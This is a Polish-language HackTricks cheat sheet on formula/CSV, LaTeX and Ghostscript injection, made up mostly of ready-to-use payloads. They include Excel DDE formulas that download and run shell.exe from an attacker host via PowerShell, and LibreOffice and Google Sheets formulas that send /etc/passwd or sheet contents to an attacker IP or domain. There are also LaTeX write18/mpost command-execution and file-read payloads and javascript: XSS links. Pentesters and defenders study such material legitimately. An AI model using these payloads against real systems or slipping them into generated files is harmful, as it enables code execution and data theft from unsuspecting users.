# Formula/CSV/Doc/LaTeX/GhostScript Injection

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Formula Injection

### Info

Jeśli twój **input** jest **odzwierciedlany** w **plikach CSV** (lub jakichkolwiek innych plikach, które prawdopodobnie będą otwierane przez **Excel**), możesz być w stanie wprowadzić **formuły** Excela, które będą **wykonywane**, gdy użytkownik **otworzy plik** lub gdy użytkownik **kliknie w jakiś link** w arkuszu Excela.

{% hint style="danger" %}
Obecnie **Excel będzie ostrzegać** (wielokrotnie) **użytkownika, gdy coś jest ładowane z zewnątrz Excel**, aby zapobiec jego złośliwym działaniom. Dlatego należy szczególnie skupić się na inżynierii społecznej w końcowym ładunku.
{% endhint %}

### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### Hyperlink

**Poniższy przykład jest bardzo przydatny do eksfiltracji treści z końcowego arkusza Excel i do wykonywania żądań do dowolnych lokalizacji. Wymaga jednak, aby użytkownik kliknął w link (i zaakceptował komunikaty ostrzegawcze).**

Poniższy przykład został zaczerpnięty z [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)

Wyobraź sobie naruszenie bezpieczeństwa w systemie zarządzania danymi studentów, które zostało wykorzystane za pomocą ataku CSV injection. Głównym celem atakującego jest kompromitacja systemu używanego przez nauczycieli do zarządzania danymi studentów. Metoda polega na tym, że atakujący wstrzykuje złośliwy ładunek do aplikacji, wprowadzając szkodliwe formuły do pól przeznaczonych na dane studentów. Atak przebiega następująco:

1. **Wstrzyknięcie złośliwego ładunku:**
* Atakujący przesyła formularz danych studenta, ale dodaje formułę powszechnie używaną w arkuszach kalkulacyjnych (np. `=HYPERLINK("<malicious_link>","Kliknij tutaj")`).
* Ta formuła ma na celu utworzenie hiperlinku, ale wskazuje na złośliwy serwer kontrolowany przez atakującego.
2. **Eksportowanie skompromitowanych danych:**
* Nauczyciele, nieświadomi kompromitacji, korzystają z funkcji aplikacji, aby wyeksportować dane do pliku CSV.
* Plik CSV, po otwarciu, nadal zawiera złośliwy ładunek. Ten ładunek pojawia się jako klikalny hiperlink w arkuszu kalkulacyjnym.
3. **Wywołanie ataku:**
* Nauczyciel klika w hiperlink, wierząc, że jest to legalna część danych studenta.
* Po kliknięciu, wrażliwe dane (potencjalnie w tym szczegóły z arkusza kalkulacyjnego lub komputera nauczyciela) są przesyłane na serwer atakującego.
4. **Rejestrowanie danych:**
* Serwer atakującego odbiera i rejestruje wrażliwe dane przesłane z komputera nauczyciela.
* Atakujący może następnie wykorzystać te dane do różnych złośliwych celów, dalej kompromitując prywatność i bezpieczeństwo studentów oraz instytucji.

### RCE

**Sprawdź** [**oryginalny post**](https://notsosecure.com/data-exfiltration-formula-injection-part1) **w celu uzyskania dalszych szczegółów.**

W określonych konfiguracjach lub starszych wersjach Excela, funkcja zwana Dynamic Data Exchange (DDE) może być wykorzystana do wykonywania dowolnych poleceń. Aby to wykorzystać, należy włączyć następujące ustawienia:

* Przejdź do Plik → Opcje → Centrum zaufania → Ustawienia Centrum zaufania → Zawartość zewnętrzna i włącz **Uruchamianie serwera Dynamic Data Exchange**.

Gdy arkusz kalkulacyjny z złośliwym ładunkiem jest otwierany (i jeśli użytkownik zaakceptuje ostrzeżenia), ładunek jest wykonywany. Na przykład, aby uruchomić aplikację kalkulatora, ładunek byłby:
```markdown
=cmd|' /C calc'!xxx
```
Dodatkowe polecenia mogą być również wykonywane, takie jak pobieranie i uruchamianie pliku za pomocą PowerShell:
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### Local File Inclusion (LFI) w LibreOffice Calc

LibreOffice Calc może być używany do odczytu lokalnych plików i eksfiltracji danych. Oto kilka metod:

* Odczyt pierwszej linii z lokalnego pliku `/etc/passwd`: `='file:///etc/passwd'#$passwd.A1`
* Eksfiltracja odczytanych danych do serwera kontrolowanego przez atakującego: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Eksfiltracja więcej niż jednej linii: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* Eksfiltracja DNS (wysyłanie odczytanych danych jako zapytań DNS do serwera DNS kontrolowanego przez atakującego): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`

### Google Sheets do eksfiltracji danych Out-of-Band (OOB)

Google Sheets oferuje funkcje, które mogą być wykorzystane do eksfiltracji danych OOB:

* **CONCATENATE**: Łączy ciągi razem - `=CONCATENATE(A2:E2)`
* **IMPORTXML**: Importuje dane z typów danych strukturalnych - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
* **IMPORTFEED**: Importuje kanały RSS lub ATOM - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
* **IMPORTHTML**: Importuje dane z tabel HTML lub list - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
* **IMPORTRANGE**: Importuje zakres komórek z innego arkusza kalkulacyjnego - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
* **IMAGE**: Wstawia obraz do komórki - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`

## Wstrzyknięcie LaTeX

Zazwyczaj serwery, które znajdziesz w internecie, które **konwertują kod LaTeX na PDF**, używają **`pdflatex`**.\
Ten program używa 3 głównych atrybutów do (z)zezwolenia na wykonanie poleceń:

* **`--no-shell-escape`**: **Wyłącza** konstrukcję `\write18{command}`, nawet jeśli jest włączona w pliku texmf.cnf.
* **`--shell-restricted`**: To samo co `--shell-escape`, ale **ograniczone** do 'bezpiecznego' zestawu **zdefiniowanych** \*\*poleceń (\*\*Na Ubuntu 16.04 lista znajduje się w `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Włącza** konstrukcję `\write18{command}`. Polecenie może być dowolnym poleceniem powłoki. Ta konstrukcja jest normalnie zabroniona z powodów bezpieczeństwa.

Jednak istnieją inne sposoby na wykonanie poleceń, więc aby uniknąć RCE, bardzo ważne jest użycie `--shell-restricted`.

### Odczytaj plik <a href="#read-file" id="read-file"></a>

Możesz potrzebować dostosować wstrzyknięcie z użyciem wrapperów, takich jak \[ lub $.
```bash
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### Odczytaj plik jednoliniowy
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### Odczyt pliku z wieloma liniami
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### Zapisz plik <a href="#write-file" id="write-file"></a>
```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Wykonanie polecenia <a href="#command-execution" id="command-execution"></a>

Wejście polecenia zostanie przekierowane do stdin, użyj pliku tymczasowego, aby je uzyskać.
```bash
\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
Jeśli napotkasz jakikolwiek błąd LaTex, rozważ użycie base64, aby uzyskać wynik bez złych znaków.
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```

```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>

Od [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## Ghostscript Injection

**Sprawdź** [**https://blog.redteam-pentesting.de/2023/ghostscript-overview/**](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)

## Referencje

* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)


{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Wsparcie HackTricks</summary>

* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.

</details>
{% endhint %}